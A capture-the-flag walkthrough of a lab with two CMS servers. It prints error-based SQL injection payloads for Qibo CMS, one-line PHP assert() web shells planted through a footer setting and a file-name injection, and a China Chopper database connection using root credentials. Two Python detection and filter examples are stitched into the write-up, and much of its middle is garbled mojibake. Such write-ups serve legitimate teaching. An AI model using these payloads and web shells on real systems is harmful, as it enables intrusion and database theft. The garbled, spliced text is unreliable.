Introduction to Penetration Testing: Penetration Testing Notes
 2019-8-20
 

 

Editor's recommendation:
This article comes from a personal blog. It walks through a combined penetration challenge; the core of penetration testing is collecting information about the target system, finding its vulnerabilities, and exploiting them.

0x00 Preface

This challenge is a fairly comprehensive penetration exercise: it asks you to compromise two server systems. Plenty of vulnerabilities for both CMSes can be found online, and they are often used as practice targets for penetration testing.

According to the hints, question 1 asks for the administrator account and password of the consultation platform; question 2 requires logging in to the server's admin backend, planting a web shell, connecting to it with China Chopper, and then finding the flag file on the administrator's desktop; question 3 asks for the salt value of the admin account in the forum community's database.

Challenge link: https://www.ichunqiu.com/battalion?t=2&r=54399

Walkthrough link: https://www.ichunqiu.com/vm/50629/1

0x01 Obtaining the backend login password for www.test.ichunqiu

Error-based SQL injection is a common way to obtain an administrator's account and password. Searching the browser for exploitable vulnerabilities in Qibo CMS turns up an error-based SQL injection: in /member/special.php the $TB_pre variable is never initialised or filtered and is concatenated straight into the query, so once the injection fires the administrator's account and password can be read from the error message. For details see:

Qibo CMS whole-site system SQL injection

Now open Firefox and, following the vulnerability write-up, register an arbitrary account first:

After logging in, click Member Centre -> Topic Management -> Create Topic and create any topic:

Click the topic name, look at the URL of the topic page that opens, and note down its id value (here id=27):

Next, visit http://www.test.ichunqiu/member/special.php, open the HackBar tool, and fill in the URL and request data in the format given in the vulnerability report. The URL query string is job=show_BBSiframe&id=27&type=all (the id value must equal the topic ID above), and the request data is the error-based SQL injection payload:

Tip: to make HackBar easier to use, click Menu -> Customize in the top-right corner of the browser and drag HackBar onto the toolbar.

The error message reveals that the administrator account is admin, but only 26 characters of the password hash are shown (MySQL truncates the XPath error message to 32 characters, and "~admin" uses six of them). Adjusting the payload's output and injecting again reveals the full password hash, b10a9a82cf828627be682033e6c5878c:

The payload above is a slight modification of the one in the vulnerability report; without the change the full password hash cannot be printed.

There are many functions that can be used for error-based SQL injection; this challenge uses extractvalue():

TB_pre=qb_members where 1 and extractvalue(1,concat(0,(select concat(0x7e,username,password) from qb_members limit 1)))-- a

updatexml() works too:

TB_pre=qb_members where 1 and updatexml(1,concat(0,(select concat(0x7e,username,password) from qb_members limit 1)),0)-- a

Below are the ten most commonly used MySQL error-generating functions, summarised from 倾旋's public course. Look each one up in the official documentation, read and practise a lot, and it will become second nature:
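As an added detection example that is not part of the original write-up, the following Python scans constructed web-server log lines for the error-based injection pattern described above; the log format, the extra body field, the IP addresses and the timestamps are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (not from the original write-up): combined format plus a
# final quoted field holding the captured POST body. Lines 3 and 4 reproduce the
# /member/special.php request shape with the extractvalue() and updatexml()
# payloads URL-encoded; the rest is benign. Every request returned 200, because
# error-based injection leaks data inside a "successful" page: status codes
# alone never flag it, so the decoded parameters have to be inspected.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2019:10:01:02 +0800] "GET /member/special.php?job=show_BBSiframe&id=27&type=all HTTP/1.1" 200 1523 ""
10.0.0.5 - - [20/Aug/2019:10:01:09 +0800] "GET /index.php HTTP/1.1" 200 9821 ""
10.0.0.5 - - [20/Aug/2019:10:02:31 +0800] "POST /member/special.php?job=show_BBSiframe&id=27&type=all HTTP/1.1" 200 1877 "TB_pre=qb_members+where+1+and+extractvalue(1%2Cconcat(0%2C(select+concat(0x7e%2Cusername%2Cpassword)+from+qb_members+limit+1)))--+a"
10.0.0.7 - - [20/Aug/2019:10:03:00 +0800] "POST /member/special.php?job=show_BBSiframe&id=27&type=all HTTP/1.1" 200 1877 "TB_pre=qb_members+where+1+and+updatexml(1%2Cconcat(0%2C(select+concat(0x7e%2Cusername%2Cpassword)+from+qb_members+limit+1))%2C0)--+a"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \d+ "(?P<body>[^"]*)"$'
)
# The two error-based primitives the write-up uses, called with an open paren.
ERROR_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.IGNORECASE)
# TB_pre is a table prefix; a WHERE right after the prefix is never legitimate.
PREFIX_ABUSE = re.compile(r"\bTB_pre=\w+\s+where\b", re.IGNORECASE)


def classify(decoded: str) -> list:
    """Reasons a decoded query string plus body looks like error-based SQLi."""
    reasons = []
    m = ERROR_FUNCS.search(decoded)
    if m:
        reasons.append(f"error-based function {m.group(1).lower()}()")
    if PREFIX_ABUSE.search(decoded):
        reasons.append("SQL smuggled into the TB_pre table prefix")
    return reasons


def scan(log_text: str) -> list:
    """Parse each line, URL-decode query string and body, collect suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than crash the scanner
        path, _, query = m["target"].partition("?")
        decoded = unquote_plus(query) + "\n" + unquote_plus(m["body"])
        reasons = classify(decoded)
        if reasons:
            hits.append({"ip": m["ip"], "time": m["ts"], "path": path, "reasons": reasons})
    return hits
```

Running scan(SAMPLE_LOG) flags only the two POST requests and names the primitive each one used, which is the signal a WAF rule or SIEM search should key on rather than the response code.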

×îºóÀûÓà MD5½âÃܹ¤¾ß ¶ÔÃÜÂë¹þÏ£Öµ½âÃÜ£¬µÃµ½ÃÜÂëÃ÷ÎÄΪ whoami!@#123£º

0x02 »ñȡĿ±ê·þÎñÆ÷ 1 ¹ÜÀíÔ±×ÀÃæµÄ FLAG ÎļþÐÅÏ¢

»ñÈ¡Á˹ÜÀíԱȨÏÞ£¬Ï൱ÓÚÍê³ÉÁË getshell µÄÒ»°ë¡£Ëæ±ãËÑËѿɷ¢ÏÖÐí¶àÓÃÓÚÆë²© CMS getshell µÄ©¶´£¬ÏÂÃæÑ¡È¡Á½¸öÎļþдÈë©¶´½øÐи´ÏÖ¡£

ºǫ́ƵµÀÒ³°æÈ¨ÐÅϢдÈëľÂí

µÚÒ»¸ö©¶´Éæ¼°Á½¸ö²Ù×÷£ºÒ»ÊÇÔÚÍøÒ³µ×²¿°æÈ¨ÐÅÏ¢ÖÐдÈëÒ»¾ä»°Ä¾Âí£¬¶þÊÇ´´½¨ÆµµÀ¾²Ì¬»¯Ò³Ã档©¶´±¨¸æÖÐδ¸ø³öÉ󼯹ý³Ì£¬±¾È˶ԴË×éºÏÈ­ÉõÊÇÅå·þ£¬ÏêÇé¿É²Î¿¼£º

Æë²©cms×îкǫ́getshell

ÏÈËÑË÷µ½Æë²© CMS µÄĬÈϵǼºǫ́Ϊ /admin/index.php£¬Ëì³¢ÊÔ·ÃÎÊ£¬·¢ÏÖºǫ́·¾¶È·ÊµÃ»Ð޸ġ£ÔÙÓÃÕ˺Šadmin ÓëÃÜÂë whoami!@#123 µÇ¼ºǫ́£º

ÒÀ´Îµã»÷ ϵͳ¹¦ÄÜ -> È«¾Ö²ÎÊýÉèÖã¬ÔÚ ÍøÒ³µ×²¿°æÈ¨ÐÅÏ¢ ÖÐдÈëÒ»¾ä»°Ä¾Âí <?php @assert($_POST['cmd']); ?> ºó±£´æÉèÖãº

ÕâÀïΪʲô²»Óô«Í³µÄÒ»¾ä»°Ä¾Âí <?php @eval($_POST['cmd']); ?> ÄØ£¿ÒòΪ CMS ¶Ô eval() º¯Êý½øÐÐÁ˹ýÂË£¬»á½«Æäת±ä³É eva l()£º

ËùÒÔ´Ë´¦ÄÜÓà assert() º¯ÊýдÈëľÂí£¬Ò²ÌåÏÖÁË CMS µÄдÈë¹ýÂ˲»ÍêÈ«¡£½Ó×ŵã»÷ ϵͳ¹¦ÄÜ -> ƵµÀ¶ÀÁ¢Ò³¹ÜÀí -> Ìí¼ÓƵµÀÒ³£¬ÔÚ ÆµµÀÒ³Ãû×Ö ´¦ÌîÉÏÈÎÒâ×Ö·û£¨´Ë´¦ÒÔ sqli ΪÀý£©£¬ÔÚ ¾²Ì¬ÎļþÃû ´¦±ØÐëÌîÉÏ .php ÎļþÃû£¬·ñÔò²Ëµ¶Á¬½Ó²»ÉÏ£¨´Ë´¦ÒÔ sqli.php ΪÀý£©£º

µã»÷ Ìá½» ºó£¬¿ÉÔÚ ÆµµÀ¹ÜÀíÒ³ Öп´µ½ËùÌí¼ÓµÄƵµÀÒ³£¬½ÓÏÂÀ´Ò»¶¨Òªµã»÷ ¾²Ì¬»¯ °´Å¥£¬²ÅÄÜÕý³£·ÃÎÊ http://www.test.ichunqiu/sqli.php£¬·ñÔòÖ»»áµ¯³ö 404 Ò³Ãæ£º

ÔÚÈ·ÈÏÄܹ»Õý³£ sqli.php Ò³Ãæºó£¬×¼±¸ Ìí¼ÓSHELL ½øÐв˵¶Á¬½Ó£º

³É¹¦Á¬½Óºó£¬ÔÚ¹ÜÀíÔ±×ÀÃæÉÏ¿´µ½ÁË flag Îļþ£º

´ò¿ª flag Îļþ¼´¿É»ñµÃ key{636bb37e}£¬Òò´ËµÚ 2 Ìâ´ð°¸¾ÍÊÇ 636bb37e£º

ǰ̨À¸Ä¿Í¶¸å×Ô¶¨ÒåÎļþÃûдÈëľÂí

µÚ¶þ¸ö©¶´ÊÇÔÚǰ̨À¸Ä¿Í¶¸åÉèÖÃÐÅÏ¢ÖÐµÄ ×Ô¶¨ÒåÎļþÃû ÊäÈë¿òÄÚ´¥·¢£¬Òò´ËÐèÒª¡°×Ô¶¨ÒåÄÚÈÝÒ³ÎļþÃû¡±µÄȨÏÞ£¬²»¹ýÎÒÃÇÒѾ­ÓÐÁ˹ÜÀíԱȨÏÞ£¬¹Ê²»±Øµ£ÐÄ´ËÎÊÌâ¡£ÏêÇé¿É²Î¿¼£º

Æë²©CMSij´¦ÈÎÒâÎļþдÈëgetshell£¨ÐèÒªÒ»¶¨È¨ÏÞ£©

Ê×ÏÈÓÃÕ˺Šadmin ÓëÃÜÂë whoami!@#123 ÔÚǰ̨µÇ¼£¬²¢µã»÷ £¡ÎÒҪͶ¸å£º

ÈÎѡһÀ¸Ä¿£¬ÔÚ ÎÒҪͶ¸å ´¦µã»÷ ·¢±í£¨´Ë´¦ÒÔÉç»áÐÂÎÅÀ¸Ä¿ÎªÀý£©£º

ÏÈÔÚ ÆäËûÉèÖà ±êǩҳÏ嵀 ×Ô¶¨ÒåÎļþÃû ÊäÈë¿òÖÐдÈëľÂí x';@assert($_POST['cmd']);//y.htm£º

ÆäÖÐ x';ÊÇΪÁ˱պϴúÂëÖеÄ×óµ¥ÒýºÅ£¬//y.htm ÊÇΪÁËʹÕûÌåÎļþÃûÓо²Ì¬ÍøÒ³µÄºó׺£¬²¢ÇÒ×¢Ê͵ôºóÃæµÄ´úÂë¡£×¢Òâ´Ë´¦²»ÄÜÓà eval() º¯Êý¹¹ÔìľÂí£¬ÓëǰÎÄÒ»Ñù»á±»¹ýÂË¡£

Ôٻص½ »ù±¾ÐÅÏ¢ ±êǩҳÏ£¬½«´ø (*) µÄ±ØÌîÐÅÏ¢ÌîºÃºóÌá½»£º

Ìá½»ºó·ÃÎÊ http://www.test.ichunqiu/data/showhtmltype.php£¬³É¹¦¿´µ½±¨´íÐÅÏ¢£º

½ÓÏÂÀ´ Ìí¼ÓSHELL ½øÐв˵¶Á¬½Ó£º

³É¹¦Á¬½Óºó£¬¿ÉÔÚ /data/showhtmltype.php Ô´ÂëÖп´µ½ËùÌí¼ÓµÄľÂí£¬Ó¡Ö¤ÁË©¶´µÄ´æÔÚ£º

²é¿´¹ÜÀíÔ±×ÀÃæÉ쵀 flag ÎļþÓëǰÎÄÒ»Ö£¬´Ë´¦²»ÔÙ׸Êö¡£
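As an added example that is neither the write-up's nor Qibo CMS's own code, the Python below models the eval()-only rewrite observed in both the copyright-text field and the custom-file-name field above, and contrasts it with checks that reject the whole class of input rather than one function name; the exact filter behaviour, the marker list and the file-name pattern are assumptions.

```python
import re


def weak_filter(value: str) -> str:
    """Stand-in for the CMS rewrite the write-up observed: eval( becomes eva l(."""
    return re.sub(r"eval\s*\(", "eva l(", value, flags=re.IGNORECASE)


def weak_filter_blocks(value: str) -> bool:
    """True only when the legacy rewrite actually changed, and so neutralised, the input."""
    return weak_filter(value) != value


# A footer setting is rendered from a PHP file, so any PHP tag in it is code, not text.
PHP_TAG = re.compile(r"<\?|\?>")
# Assumed marker list: calls that evaluate or execute a string, superglobal reads,
# and backtick execution. None of these belongs in footer text or a file name.
CODE_MARKERS = re.compile(
    r"\b(eval|assert|create_function|call_user_func(_array)?|system|exec|shell_exec"
    r"|passthru|popen|proc_open)\s*\(|\$_(POST|GET|REQUEST|COOKIE|SERVER)\b|`",
    re.IGNORECASE,
)


def footer_setting_ok(value: str) -> bool:
    """Reject PHP tags and code markers; the structural fix is to store settings as data."""
    return not (PHP_TAG.search(value) or CODE_MARKERS.search(value))


# Allowlist for the custom file name: a plain stem and a static-page suffix only,
# so quotes, semicolons and slashes never reach the generated source.
FILENAME_OK = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(html?|shtml)$")


def custom_filename_ok(value: str) -> bool:
    """True only for names matching the allowlist pattern."""
    return FILENAME_OK.fullmatch(value) is not None
```

The eval() shell is mangled by weak_filter while the assert() shell passes untouched, which is exactly the gap the write-up exploited; both fail footer_setting_ok, and the x';...//y.htm file name fails custom_filename_ok.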

0x03 Obtaining the salt value of admin from the bbs.test.ichunqiu database

Question 3 finally brings in the database of the http://bbs.test.ichunqiu forum community... The challenge author, apparently to let us go straight to this question, helpfully placed a web shell at /2.php in the root of the main site, sparing us the shell-planting steps of the previous question:

So to reproduce question 3 directly next time, just connect to this shell with Chopper:

In the root directory we can see a /dedecms_bak folder. A further search shows that the default database configuration file of DEDECMS is /data/common.inc.php; opening it confirms the expectation:

But the host address shown is 172.16.12.3; surely that has nothing to do with http://bbs.test.ichunqiu? Actually it does: open a terminal on the host, and the nslookup command shows that the forum's IP address is exactly 172.16.12.3, and in passing that the main site's IP address is 172.16.12.2:

Note that the database configuration uses the root user, so if we can connect to the DEDECMS database on 172.16.12.3, the Discuz! database on 172.16.12.3 can be accessed as well! So fill in the database information in Chopper's Add SHELL configuration (THUPL):

Tip: for how to enter database configuration information in Chopper, see "Site-hacking tool: features and usage of China Chopper".

<T>mysql</T>
<H>172.16.12.3</H>
<U>root</U>
<P>opiznmzs&**(</P>
<L>gbk</L>

After saving the settings, right-click the entry and choose Database Management; once connected, the server-side database management interface appears:

After another round of searching, ultrax turns out to be the Discuz! database, while dedecms is obviously DEDECMS's. Our target should be the salt field of some table in the ultrax database, which calls for an introduction to MySQL's built-in information_schema database. It provides access to metadata and is the encyclopaedia of MySQL; its information_schema.COLUMNS table records information about every column on this database server. For details see:

What is information_schema in MySQL

So a single simple SQL statement, followed by a click on Execute, presents everything about the salt field:

SELECT * FROM COLUMNS WHERE COLUMN_NAME = 'salt'

Finally, in the pre_ucenter_members table of the ultrax database we find that the salt field's value is 9b47b6:

At this point the assigned tasks of this penetration test are complete.

Readers who want more can keep going: since we have already dumped the database on 172.16.12.3, we might as well take the opportunity to dump the one on 172.16.12.2 too. A search shows that the default database configuration file of Qibo CMS is /data/mysql_config.php:

Then change the database information in Chopper's Add SHELL configuration:

Once connected, the qb_members table of the qibov7 database contains the administrator account and password hash from question 1:

With that, the database systems on both servers in this challenge have been broken through. Those who want to dig deeper are advised to try obtaining a webshell on the forum community and escalating privileges to gain the highest privileges on both server systems, achieving complete control.

0x04 Summary

Although this challenge has two target servers, the approach never changes, and with practice it comes naturally. I also benefited greatly from the process. Careful readers will notice that the word "search" appears many times throughout, and the core of penetration testing is precisely collecting information about the target system, finding its vulnerabilities, and exploiting them.
